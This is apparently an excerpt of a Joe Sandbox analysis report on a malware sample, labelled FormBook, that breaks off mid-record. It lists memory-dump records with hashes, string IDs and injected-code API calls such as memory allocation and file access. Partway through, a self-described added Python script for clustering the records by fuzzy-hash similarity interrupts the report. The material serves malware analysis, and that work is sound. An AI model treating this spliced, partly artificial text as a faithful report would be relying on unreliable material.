                                                                • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                • Instruction Fuzzy Hash: 1DE04636244208BBE620EA5ADC42FDBB7ACDFC5710F004419FA0CAB241C6B0B91586F0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3b604f70faa193a511ffc00a9ba2102b0b5352e2f87c70e95fe3c82e934c9439
                                                                • Instruction ID: 2e22ff263a321106b7daf67f7385baeac463435500a576da1e20d18d4088f643
                                                                • Opcode Fuzzy Hash: 3b604f70faa193a511ffc00a9ba2102b0b5352e2f87c70e95fe3c82e934c9439
                                                                • Instruction Fuzzy Hash: 1BC012756003087BD640DA88CC47F65339C9748610F404050B90D8B241E574B9504755
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_9e0000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 2$):$+x$1`$<8$>$BL$Fv$L$R<$[$g$l$lv$u7$}$5
                                                                • API String ID: 0-2604029153
                                                                • Opcode ID: 42523a91f73f217738a8ad6d96c4818f305878fdb03b3f1d771c2e1715a6438b
                                                                • Instruction ID: e67b84f3e355df18e3e181d8dd375d751efc5e49c49abb1380d5c0291c558775
                                                                • Opcode Fuzzy Hash: 42523a91f73f217738a8ad6d96c4818f305878fdb03b3f1d771c2e1715a6438b
                                                                • Instruction Fuzzy Hash: EE02B2B0D05269CBEB24CF85CD94BDDBBB2BB45308F2081DAD1097B280D7B95A89DF54
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_9e0000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7e9bbb53e3539e7af09374373e32d1746217baad1df3696705cc7ad831cd22a8
                                                                • Instruction ID: 00c701f4ecc9e890b24a93d63ec1184b5d20ac5d7204e501095ba4bccb98d910
                                                                • Opcode Fuzzy Hash: 7e9bbb53e3539e7af09374373e32d1746217baad1df3696705cc7ad831cd22a8
                                                                • Instruction Fuzzy Hash: 19C09247F491560246258C4A79700F5FBA9D1C32F6A50B7ABDD68B3A804692CA6942CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                • API String ID: 0-3248090998
                                                                • Opcode ID: d0e7571c0df165a9a4b5ed54add29b8d5dc776181788390e167ec6a48bc86d42
                                                                • Instruction ID: cb8263c622cc691dea60343ec2510c9617899dd5c2827e6ac60336ec8fc86dc4
                                                                • Opcode Fuzzy Hash: d0e7571c0df165a9a4b5ed54add29b8d5dc776181788390e167ec6a48bc86d42
                                                                • Instruction Fuzzy Hash: FE91FFF08052A98ACB118F55A5603DFBF71BB95204F1581EDC6AA7B243C3BE4E46DF90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: /$#2$+$0$4$:c$BL$C$Gj$I$Y$^$`+$f$i$i>$m$t$yv$zv$}
                                                                • API String ID: 0-617331232
                                                                • Opcode ID: 526664946cdf59d367deba820a059e4dfaf3dc6f844c3bf390b17ef636321425
                                                                • Instruction ID: 39188b68bca42b6a5dc9dfb66050e112d963a4ea5d6d7f8bc25107628d2c05bb
                                                                • Opcode Fuzzy Hash: 526664946cdf59d367deba820a059e4dfaf3dc6f844c3bf390b17ef636321425
                                                                • Instruction Fuzzy Hash: 719116B0D05669CBEB60CF85D9587DEBBB1BB45308F1081C9C1593B281CBBA1A89CF95
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: /$#2$+$0$4$:c$BL$C$Gj$I$Y$^$`+$f$i$i>$m$t$yv$zv$}
                                                                • API String ID: 0-617331232
                                                                • Opcode ID: 0d9fe08b0a411d4c11d88abc8bc2aab57cf2c48dea716e23f1fa3925386cc167
                                                                • Instruction ID: e63c6cbefeb25b60712c572f3bccc138af23440cbaf3eac85ebddcd268ba3524
                                                                • Opcode Fuzzy Hash: 0d9fe08b0a411d4c11d88abc8bc2aab57cf2c48dea716e23f1fa3925386cc167
                                                                • Instruction Fuzzy Hash: F99127B0D05769CBEB60CF85D9587DEBBB1BB05308F1081C9C1593B281CBBA1A89CF95
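The two records above share the same String ID and API String ID (0-617331232) but carry different Opcode IDs and Instruction IDs, which is what an analyst would expect from two near-identical copies of one routine in the injected region. The following is an added example, not code from the Joe Sandbox report or from Joe Sandbox itself: a small Python parser for these per-function metadata records, run over a constructed excerpt copied from the two records at 0-617331232 and the record at 0-685823316 (trimmed to the fields the script uses; the omitted Snapshot File, Instruction ID and Opcode Fuzzy Hash lines parse the same way). It groups records by API String ID, reports groups whose members differ in Opcode ID, and counts the hex digits at which their Instruction Fuzzy Hashes differ. That count is an illustrative heuristic assumed for this example, not Joe Sandbox's own similarity metric, whose algorithm the page does not describe.

```python
"""Parse Joe Sandbox per-function metadata records and flag functions that
reference the same strings but carry different code hashes.

Added example, not part of the original report or of Joe Sandbox.  The hex
Hamming distance is an illustrative heuristic, not Joe Sandbox's metric."""
import re
from collections import defaultdict

# Constructed excerpt: three records copied from the report, trimmed to the
# fields this script uses.  Raw string so the backslash in the String ID of
# the third record survives unchanged.
SAMPLE = r"""
Memory Dump Source
• Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
Similarity
• String ID: /$#2$+$0$4$:c$BL$C$Gj$I$Y$^$`+$f$i$i>$m$t$yv$zv$}
• API String ID: 0-617331232
• Opcode ID: 526664946cdf59d367deba820a059e4dfaf3dc6f844c3bf390b17ef636321425
• Instruction Fuzzy Hash: 719116B0D05669CBEB60CF85D9587DEBBB1BB45308F1081C9C1593B281CBBA1A89CF95
Memory Dump Source
• Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
Similarity
• String ID: /$#2$+$0$4$:c$BL$C$Gj$I$Y$^$`+$f$i$i>$m$t$yv$zv$}
• API String ID: 0-617331232
• Opcode ID: 0d9fe08b0a411d4c11d88abc8bc2aab57cf2c48dea716e23f1fa3925386cc167
• Instruction Fuzzy Hash: F99127B0D05769CBEB60CF85D9587DEBBB1BB05308F1081C9C1593B281CBBA1A89CF95
Memory Dump Source
• Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
Similarity
• String ID: D$\$e$e$i$l$n$r$r$w$x
• API String ID: 0-685823316
• Opcode ID: b9a0281c628507633b51722d22e164fd841d120133abac6fcf16d45ab3862f2d
• Instruction Fuzzy Hash: 483198B5D10318AAEF10DFE0DC85FEE7BB9AF48700F00815CE6187A180DBB556488BA5
"""

# A field line is "• Label: value"; the label runs up to the first colon, so
# the colons inside a Source File or String ID value are left in the value.
FIELD_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")
RECORD_START = "Memory Dump Source"


def parse_records(text):
    """Return one dict per 'Memory Dump Source' record, keyed by field label.
    Headings such as 'Similarity' or 'Yara matches' carry no bullet and are
    skipped; the dump offset is pulled out of the Source File value."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == RECORD_START:
            current = {}
            records.append(current)
            continue
        if current is None:
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        current[key] = value
        if key == "Source File":
            off = OFFSET_RE.search(value)
            current["Offset"] = off.group(1) if off else ""
    return records


def hex_hamming(a, b):
    """Number of hex-digit positions at which two fuzzy hashes differ.
    Assumption for this example: a position-wise comparison is meaningful.
    This is not Joe Sandbox's similarity score."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes have different lengths")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))


def string_clones(records):
    """Group records by non-empty API String ID and keep the groups that hold
    more than one distinct Opcode ID: same string references, different code."""
    groups = defaultdict(list)
    for r in records:
        key = r.get("API String ID", "")
        if key:
            groups[key].append(r)
    return {k: v for k, v in groups.items()
            if len({r.get("Opcode ID") for r in v}) > 1}


def clone_report(records):
    """Pair the members of each clone group and return
    (api_string_id, opcode_a, opcode_b, hamming) tuples, closest first."""
    out = []
    for key, members in string_clones(records).items():
        for i in range(len(members)):
            for j in range(i + 1, len(members)):
                a, b = members[i], members[j]
                out.append((key, a["Opcode ID"], b["Opcode ID"],
                            hex_hamming(a["Instruction Fuzzy Hash"],
                                        b["Instruction Fuzzy Hash"])))
    return sorted(out, key=lambda t: t[3])


if __name__ == "__main__":
    for key, oa, ob, dist in clone_report(parse_records(SAMPLE)):
        print(f"API String ID {key}: {oa[:12]}... vs {ob[:12]}... "
              f"differ in {dist} hex digits of the Instruction Fuzzy Hash")
```

Run against the full report text instead of the excerpt, the same parser gives a per-dump-region inventory of Opcode IDs and fuzzy hashes that can be matched against other FormBook samples; the two records at 0-617331232 differ in only 6 of 70 hex digits, concentrated in the leading bytes of the hash, which is consistent with two copies of one routine rather than two unrelated functions that happen to reference the same strings.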
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                • API String ID: 0-685823316
                                                                • Opcode ID: b9a0281c628507633b51722d22e164fd841d120133abac6fcf16d45ab3862f2d
                                                                • Instruction ID: 5b1336a0c34d7f173c05c82dc98bdb42177bbd0779db2850c32f45692877fafb
                                                                • Opcode Fuzzy Hash: b9a0281c628507633b51722d22e164fd841d120133abac6fcf16d45ab3862f2d
                                                                • Instruction Fuzzy Hash: 483198B5D10318AAEF10DFE0DC85FEE7BB9AF48700F00815CE6187A180DBB556488BA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: &$0$1$?$F$V$i
                                                                • API String ID: 0-3123711973
                                                                • Opcode ID: 2eb6d39b897ff1a2d41656db76857acd2c04c31815ff3af14003de6acb85ec0b
                                                                • Instruction ID: 63949ab0e523873d47ebf92bb3fb4e3770303179a8209336e3c0b11a8a5543f3
                                                                • Opcode Fuzzy Hash: 2eb6d39b897ff1a2d41656db76857acd2c04c31815ff3af14003de6acb85ec0b
                                                                • Instruction Fuzzy Hash: 9411C910D087CA9DDB22CABC89482AEBF711F23224F4883D994F12A2D6D2754606C7A6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0$4$A$n
                                                                • API String ID: 0-4168700205
                                                                • Opcode ID: d73cc434336410cdfdd71110f8e7ff97fecde8f4f35086e6cd62e914452b6f07
                                                                • Instruction ID: 1900c2d1628af835675820df44e8b81ea612a6c14a9d31408f84c53f309166c3
                                                                • Opcode Fuzzy Hash: d73cc434336410cdfdd71110f8e7ff97fecde8f4f35086e6cd62e914452b6f07
                                                                • Instruction Fuzzy Hash: 523144B5910209BBDB04DFA4CC41BFEB7B8EF44304F008199E909AB240E775AE458BE5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3700000_lOYqgVWsbtwCn.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 1$C$VKXA$W]PE
                                                                • API String ID: 0-3703782850
                                                                • Opcode ID: 6fed6f7b6c3b83d7620e039cd20e98104286a84af2124d77ed301d29971b9906
                                                                • Instruction ID: d40841f1207eb61840a4a274fb3a85bc56d4b7ee4cc3bf7b4a24f4e4df967f3b
                                                                • Opcode Fuzzy Hash: 6fed6f7b6c3b83d7620e039cd20e98104286a84af2124d77ed301d29971b9906
                                                                • Instruction Fuzzy Hash: F8F0A0B090020C6BCB00EFA8D9446EEBBB8EF40300F2084A8D8196B202E7349B04CB96

                                                                Execution Graph

                                                                Execution Coverage:2.6%
                                                                Dynamic/Decrypted Code Coverage:3.9%
                                                                Signature Coverage:1.4%
                                                                Total number of Nodes:483
                                                                Total number of Limit Nodes:77
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0321C5E4
                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0321C61F
                                                                • FindClose.KERNELBASE(?), ref: 0321C62A
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 3541575487-0
                                                                • Opcode ID: 86011c127d856a0f2cf1489457390f07b8c344b9b3ec3ab41ca31718808f41b2
                                                                • Instruction ID: c08f5dd3a3953a581cf676f59443c7dc90d7ad1554ecd429bca3a472b835dba1
                                                                • Opcode Fuzzy Hash: 86011c127d856a0f2cf1489457390f07b8c344b9b3ec3ab41ca31718808f41b2
                                                                • Instruction Fuzzy Hash: 2731C6B99503597BDB20DF60CD85FEF77BC9F94704F144458BA08AB180D6B0AAD4CBA1
                                                                APIs
                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,FC8E4B7A,?,?,?,?), ref: 032290FE
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 6c116602c3ce2a7586dbde19a51ad50e29691ae579f357658d5e73b24c415cbe
                                                                • Instruction ID: 179c17cf30c8077fbd000dfec30b612258d77959568996178df25710a794a959
                                                                • Opcode Fuzzy Hash: 6c116602c3ce2a7586dbde19a51ad50e29691ae579f357658d5e73b24c415cbe
                                                                • Instruction Fuzzy Hash: 6F31C2B5A11208AFDB14DF98D880EEEB7B9EF8C304F108219F919A7344D774A951CBA5
                                                                APIs
                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,FC8E4B7A,?,?), ref: 03229253
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 2825084812d6e97e4a90768c6b76eb88233662d4728ecb26d01c52c31c1abc37
                                                                • Instruction ID: 0dcadfdc8a90e3947b54bf415ab04cdfd0a6b6d559e15c44e6ee3ee5965c5253
                                                                • Opcode Fuzzy Hash: 2825084812d6e97e4a90768c6b76eb88233662d4728ecb26d01c52c31c1abc37
                                                                • Instruction Fuzzy Hash: 6B31D8B5A00208AFDB14DF98D880EEF77B9EF88314F104119F919A7240D774A951CBA4
                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(03211CCB,?,03227F3E,00000000,00000004,00003000,?,?,?,?,?,03227F3E,03211CCB,0322B3B1,03227F3E,56C03309), ref: 03229528
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: b03ee4917efc09109f1d551df49a914dcd29543988b4e9671e209da27d2be6ba
                                                                • Instruction ID: fb2806dc04be0e575a57e2e88f04832f720883af4def96dce9764f412096ba25
                                                                • Opcode Fuzzy Hash: b03ee4917efc09109f1d551df49a914dcd29543988b4e9671e209da27d2be6ba
                                                                • Instruction Fuzzy Hash: C3212BB5A10209AFDB10DF98DC41EEF77B9EF88700F104209FD19AB240D774A951CBA1
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteFile
                                                                • String ID:
                                                                • API String ID: 4033686569-0
                                                                • Opcode ID: 87a012ad8a58bfa591f051fcc329374b3f67c791c4c7b4710c4fbe4803f8a9ba
                                                                • Instruction ID: 428ec68ef87d69e17b38fcd984d346843173d2615b5e2397e2fde658520ddb11
                                                                • Opcode Fuzzy Hash: 87a012ad8a58bfa591f051fcc329374b3f67c791c4c7b4710c4fbe4803f8a9ba
                                                                • Instruction Fuzzy Hash: 3E11A075A103197ED720EBA8CC01FEB77ACEF84714F104149FA08AB280D7B5B95587A1
                                                                APIs
                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03229334
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                • Instruction ID: 26c66537ccc05658fd5c12215bba605a5c128d091ee3267880dd02357f96ebfa
                                                                • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                • Instruction Fuzzy Hash: 8AE0463A610214BBE220EA59DC01F9BB7ACDFC5764F408419FA0CAB281C6B0B92186F0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 7bb66d0a0516bffacfb8777c521f039f2937489c0ce0f29bc1526516f7ebfd2e
                                                                • Instruction ID: 00b697b3417dd74e0bf95109ca0d8c4ac07c7e1c85739c882d52e16923c875e0
                                                                • Opcode Fuzzy Hash: 7bb66d0a0516bffacfb8777c521f039f2937489c0ce0f29bc1526516f7ebfd2e
                                                                • Instruction Fuzzy Hash: 2490023160990412A140B1584898946404997E0301B55C011E0424554C8B558A565361
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 7b50d23ec37b803bab6d1cb2b1c919f29f1990e99ab645ec99b742f3654b5af0
                                                                • Instruction ID: 071c25e6e6e696cbf06b1d04839d0248360b4f19c6547838f646a8b066474913
                                                                • Opcode Fuzzy Hash: 7b50d23ec37b803bab6d1cb2b1c919f29f1990e99ab645ec99b742f3654b5af0
                                                                • Instruction Fuzzy Hash: 56900261605604425140B1584818806604997E1301395C115E0554560C875989559369
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 7f1265f7762a8640e4115958c170da7136f69ec2c72da680ee1a4fd091855bac
                                                                • Instruction ID: ab7194a2acf3d615906986d39479fd5b2bd464d25c01ec18b8f109d475a0fc58
                                                                • Opcode Fuzzy Hash: 7f1265f7762a8640e4115958c170da7136f69ec2c72da680ee1a4fd091855bac
                                                                • Instruction Fuzzy Hash: 0490023160950C02E150B1584428B46004987D0301F55C011E0024654D87968B5577A1
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 4420d02525bb0db2549474dba4861862b11ba1871de1b040611177db77df02f1
                                                                • Instruction ID: ba5173fb01be06699076b89bafdc9949885677a42d2b4041bef8ea93a2580b05
                                                                • Opcode Fuzzy Hash: 4420d02525bb0db2549474dba4861862b11ba1871de1b040611177db77df02f1
                                                                • Instruction Fuzzy Hash: 9F90023120550C02E180B1584418A4A004987D1301F95C015E0025654DCB568B5977A1
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 83f4e1a04f6439b8b2bc4a460a187d7495f599d857a082e002915a973309dedb
                                                                • Instruction ID: 09aa2b58da5100a06c4d0bbf31caf1d3b0347e05125ddf624cc974b40c8af49a
                                                                • Opcode Fuzzy Hash: 83f4e1a04f6439b8b2bc4a460a187d7495f599d857a082e002915a973309dedb
                                                                • Instruction Fuzzy Hash: 4790023120954C42E140B1584418E46005987D0305F55C011E0064694D97668E55B761
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 5a2c23c55a915dd84654e46c5295099c3c784df33b1f9848212a2cf3d124bcda
                                                                • Instruction ID: dce561f7d4a38ba3f7003e70b45de958e4bad780b40a988f708e06cf5a49f07a
                                                                • Opcode Fuzzy Hash: 5a2c23c55a915dd84654e46c5295099c3c784df33b1f9848212a2cf3d124bcda
                                                                • Instruction Fuzzy Hash: 9B900261206504035105B1584428A16404E87E0201B55C021E1014590DC66689916225
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 0d3ca7cc4d7a221818efc3d1e7ad6ac83bb23be625f12d4385aaaef426933f0f
                                                                • Instruction ID: b3d3959fe93c6281ae7fd06fcd410188bc34b19220ae16e50c6f03d21c61dd90
                                                                • Opcode Fuzzy Hash: 0d3ca7cc4d7a221818efc3d1e7ad6ac83bb23be625f12d4385aaaef426933f0f
                                                                • Instruction Fuzzy Hash: 3E900435315504031105F55C071CD0700CFC7D5351355C031F1015550CD773CD715331
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
